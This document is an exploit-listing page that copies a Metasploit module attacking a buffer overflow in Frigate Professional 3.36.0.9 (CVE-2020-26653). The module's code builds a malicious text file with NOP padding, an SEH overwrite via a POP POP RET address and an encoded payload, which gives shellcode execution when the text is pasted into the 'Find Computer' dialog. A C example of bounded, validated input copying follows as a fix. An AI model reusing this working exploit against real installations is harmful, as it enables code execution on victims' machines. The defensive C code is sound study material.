Frigate Professional 3.36.0.9 'Find Computer' Buffer Overflow (Metasploit)
CVE: CVE-2020-26653
Category: CWE-119
Price: $2500
Severity: High
Author: Metasploit
Risk: High
Exploitation Type: Local
Date: 2020-10-16
CPE: cpe:cpe:/a:frigate:professional:3.36.0.9
PURL: pkg:https://exploitalert.com/view-details/frigate-professional-3-36-0-9-039-find-computer-039-buffer-overflow-metasploit
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100096
Below is a copy:
Frigate Professional 3.36.0.9 'Find Computer' Buffer Overflow (Metasploit)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Frigate Professional 3.36.0.9 'Find Computer' Buffer Overflow",
      'Description'    => %q{
        This module exploits a buffer overflow in Frigate Professional 3.36.0.9.
        By creating a specially designed TXT file go to "Disk"> "Find Computer" then copy the
        characters located in the file (.txt) then paste it in the "Computer Name" > "OK button".
        The application is vulnerable and the buffer is overwritten, allowing the shellcode to be executed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Paras Bhatia', # Exploit-DB POC
          'ZwX'           # Metasploit Module
        ],
      'References'     =>
        [
          [ 'EDB', '48579' ],
          [ 'URL', 'https://www.exploit-db.com/exploits/48579' ],
          [ 'URL', 'https://cxsecurity.com/issue/WLB-2020060051' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 7 Ultimate SP1 X86 - Windows 7 F.Prenium x64', { 'Ret' => 0x40010C4B } ], # POP POP RET [rtl60.bpl]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x14\x09\x0a\x0d"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Jun 04 2020",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'Create malicious file', 'name.txt'])
      ])
  end

  def exploit
    file_payload = payload.encoded
    msfsploit = make_fast_nops(4112)
    msfsploit << "\xeb\x20#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH
    msfsploit << [target.ret].pack("V*") # SEH
    msfsploit << "\x90" * 50
    msfsploit << file_payload
    file_create(msfsploit)
  end
end
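
The module above relies on the "Computer Name" text being copied into a fixed-size buffer with no length check (CWE-119). As an added example, not part of the original page and not Frigate's own code, this C sketch shows a bounded, validated copy for such a field. The function name, status codes and host-name character policy are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define MAX_HOST_LEN  253   /* longest DNS host name in text form */
#define MAX_LABEL_LEN 63    /* longest single DNS label */

enum name_status { NAME_OK, NAME_EMPTY, NAME_TOO_LONG, NAME_BAD_CHAR, NAME_BAD_LABEL };

/* Hypothetical handler for the text of a "Computer Name" field.
 * in/in_len: raw field bytes and their count as reported by the UI toolkit.
 * out/out_size: destination buffer; left as an empty string on any rejection. */
enum name_status copy_computer_name(const char *in, size_t in_len,
                                    char *out, size_t out_size)
{
    size_t label = 0;

    if (out_size == 0) return NAME_TOO_LONG;
    out[0] = '\0';
    if (in_len == 0) return NAME_EMPTY;
    /* Length is checked against policy and destination before any copy. */
    if (in_len > MAX_HOST_LEN || in_len >= out_size) return NAME_TOO_LONG;

    for (size_t i = 0; i < in_len; i++) {
        unsigned char c = (unsigned char)in[i];
        if (c == '.') {                       /* label separator */
            if (label == 0) return NAME_BAD_LABEL;
            label = 0;
            continue;
        }
        /* Assumed policy: letters, digits and hyphen only. */
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '-'))
            return NAME_BAD_CHAR;             /* e.g. 0x90 padding, control bytes */
        if (++label > MAX_LABEL_LEN) return NAME_BAD_LABEL;
    }
    memcpy(out, in, in_len);
    out[in_len] = '\0';
    return NAME_OK;
}

int main(void)
{
    char out[MAX_HOST_LEN + 1], big[4200];
    memset(big, 'A', sizeof big);             /* constructed oversized input */
    printf("oversized: %d\n", copy_computer_name(big, sizeof big, out, sizeof out));
    printf("valid:     %d\n", copy_computer_name("WORKSTATION-01", 14, out, sizeof out));
    return 0;
}
```

Rejections happen before any byte is written past `out[0]`, so an oversized paste never reaches the copy.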